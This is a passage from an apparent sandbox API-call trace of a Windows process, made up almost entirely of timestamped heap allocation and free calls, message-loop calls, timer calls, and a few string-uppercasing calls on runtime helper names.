(HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0180.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0180.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0180.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0180.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0180.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0180.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0180.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0180.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0180.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0180.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0180.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0180.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0180.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0180.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0180.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0180.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0180.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0180.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0180.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0180.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0180.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0180.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0180.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0180.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0180.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0180.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0180.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0180.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0180.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0180.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0180.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0180.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0180.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0180.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0180.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0180.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0180.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0180.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0180.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0180.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0180.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0180.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0180.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0180.904] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0180.905] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0180.905] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0180.905] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0180.905] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0180.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0180.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0180.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0180.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0180.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0180.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0180.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0180.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0180.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0180.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0180.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0180.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0180.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0180.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0180.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0180.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0180.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0180.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0180.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0180.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0180.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0180.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0180.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0180.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0180.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0180.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0180.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0180.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0180.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0180.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0x11b9020 [0180.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0180.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0180.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0180.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0180.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0180.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0180.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0180.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0180.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0180.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0180.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0180.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0x1280020 [0181.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x11b9020 | out: hHeap=0x970000) returned 1 [0181.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0181.059] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0181.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0181.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0181.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0181.059] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0181.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0181.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0181.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0181.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0181.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0181.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0181.059] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0181.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0181.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0181.059] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0181.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0181.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0181.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0181.060] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0181.060] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0181.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0181.060] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0181.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0181.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0181.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0181.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0181.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0181.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0181.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0181.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0181.061] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0181.061] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0181.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0181.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0181.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 